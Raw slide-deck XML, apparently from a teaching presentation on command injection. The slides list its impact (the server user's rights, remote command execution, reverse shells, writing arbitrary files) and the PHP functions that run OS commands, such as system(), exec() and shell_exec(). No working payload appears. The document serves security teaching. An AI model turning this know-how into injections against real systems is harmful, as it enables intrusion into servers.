              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>inherits the rights of the Web Server user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Rmote Command Execution / Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Limited env: Write arbitrary files / Steal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 Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;12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Where this vulnerability is usually found?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Why does a developer need to execute shell command directly?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 Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;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Where this vulnerability is usually found?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Why does a developer need to execute shell command directly?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No suitable build-in function/third library in the program language</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Need to pass some result to another binary program as its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arguments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 Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;14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Funcs in PHP that allow user to execute OS command:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>system()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exec()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>shell_exec() == `` in php</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>passthru()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>popen()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>proc_open()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pP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4" name="Google Shape;144;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8068086" y="3034106"/>
            <a:ext cx="3285714" cy="31428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2023-10-19T13:58:52Z</dcterms:created>
  <dc:creator>Zeddyu Lu</dc:creator>
</cp:coreProperties>
</file>